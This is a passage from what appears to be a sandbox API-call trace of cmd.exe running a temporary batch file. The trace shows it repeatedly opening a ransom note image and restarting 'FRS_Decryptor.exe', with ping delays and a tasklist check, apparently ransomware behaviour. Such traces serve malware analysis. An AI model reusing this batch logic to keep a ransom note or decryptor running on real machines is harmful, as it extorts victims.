lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0114.951] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0114.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0114.951] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.951] GetFileType (hFile=0x158) returned 0x1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0114.951] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0114.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0114.951] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.951] GetFileType (hFile=0x158) returned 0x1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0114.951] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0114.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0114.951] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.951] GetFileType (hFile=0x158) returned 0x1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0114.951] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0114.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0114.952] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.952] GetFileType (hFile=0x158) returned 0x1 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0114.952] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0114.952] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0114.952] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.952] GetFileType (hFile=0x158) returned 0x1 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0114.952] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0114.952] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0114.952] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0114.952] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0114.952] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.952] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0114.952] _get_osfhandle (_FileHandle=0) returned 0x24 [0114.952] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0114.952] SetConsoleInputExeNameW () returned 0x1 [0114.952] GetConsoleOutputCP () returned 0x1b5 [0114.953] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0114.953] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.953] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0114.953] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0114.953] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.953] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0114.953] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0114.953] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0114.953] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0114.953] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0114.953] GetFileType (hFile=0x158) returned 0x1 [0114.953] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.953] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0114.953] _tell (_FileHandle=3) returned 2512 [0114.953] _close (_FileHandle=3) returned 0 [0114.953] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0114.953] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0114.953] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0114.953] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0114.953] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0114.953] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0114.953] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0114.954] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0114.954] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0114.954] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0114.954] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0114.954] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0114.954] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0114.954] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0114.954] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0114.954] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0114.954] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0114.954] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0114.954] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0114.954] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0114.954] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0114.954] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0114.954] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0114.954] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0114.954] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0114.954] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0114.954] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0114.954] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0114.954] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0114.954] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0114.954] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0114.954] _wcsicmp (_String1="ping", _String2="START") returned -3 [0114.954] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0114.954] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0114.954] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0114.954] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0114.954] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0114.954] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0114.954] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0114.954] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0114.954] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0114.954] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0114.954] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0114.954] SetErrorMode (uMode=0x0) returned 0x0 [0114.954] SetErrorMode (uMode=0x1) returned 0x0 [0114.954] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0114.954] SetErrorMode (uMode=0x0) returned 0x1 [0114.954] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.954] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.954] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.954] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.954] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0114.955] GetLastError () returned 0x2 [0114.955] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0114.955] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0114.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0114.955] GetLastError () returned 0x2 [0114.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a070 [0114.955] FindClose (in: hFindFile=0xd5a070 | out: hFindFile=0xd5a070) returned 1 [0114.955] GetFileType (hFile=0x28) returned 0x2 [0114.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0114.955] _dup (_FileHandle=1) returned 3 [0114.955] _close (_FileHandle=1) returned 0 [0114.955] _wcsicmp (_String1="nul", _String2="con") returned 11 [0114.955] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0114.955] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0114.955] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.956] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0114.956] SetErrorMode (uMode=0x0) returned 0x0 [0114.956] SetErrorMode (uMode=0x1) returned 0x0 [0114.956] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0114.956] SetErrorMode (uMode=0x0) returned 0x1 [0114.956] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.956] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.956] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.956] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.956] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0114.956] GetLastError () returned 0x2 [0114.956] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.956] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0114.956] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0114.956] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0114.956] GetLastError () returned 0x2 [0114.956] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a070 [0114.956] FindClose (in: hFindFile=0xd5a070 | out: hFindFile=0xd5a070) returned 1 [0114.956] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.957] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0114.957] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0114.957] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.957] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.958] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0114.958] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x2b8, dwProcessId=0xb74, dwThreadId=0xb68)) returned 1 [0114.960] CloseHandle (hObject=0x2b8) returned 1 [0114.960] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.960] GetEnvironmentStringsW () returned 0xd30508* [0114.960] FreeEnvironmentStringsA (penv="=") returned 1 [0114.960] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0117.017] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0117.017] CloseHandle (hObject=0x36c) returned 1 [0117.017] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0117.017] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.017] GetEnvironmentStringsW () returned 0xd7e510* [0117.017] FreeEnvironmentStringsA (penv="=") returned 1 [0117.017] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.017] GetEnvironmentStringsW () returned 0xd30508* [0117.017] FreeEnvironmentStringsA (penv="=") returned 1 [0117.017] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0117.017] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0117.017] _close (_FileHandle=3) returned 0 [0117.017] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.017] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0117.018] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.018] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0117.018] _get_osfhandle (_FileHandle=0) returned 0x24 [0117.018] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0117.018] SetConsoleInputExeNameW () returned 0x1 [0117.018] GetConsoleOutputCP () returned 0x1b5 [0117.018] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0117.018] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.019] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0117.019] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0117.019] _get_osfhandle (_FileHandle=3) returned 0x158 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0117.019] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0117.019] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0117.019] GetFileType (hFile=0x158) returned 0x1 [0117.019] _get_osfhandle (_FileHandle=3) returned 0x158 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 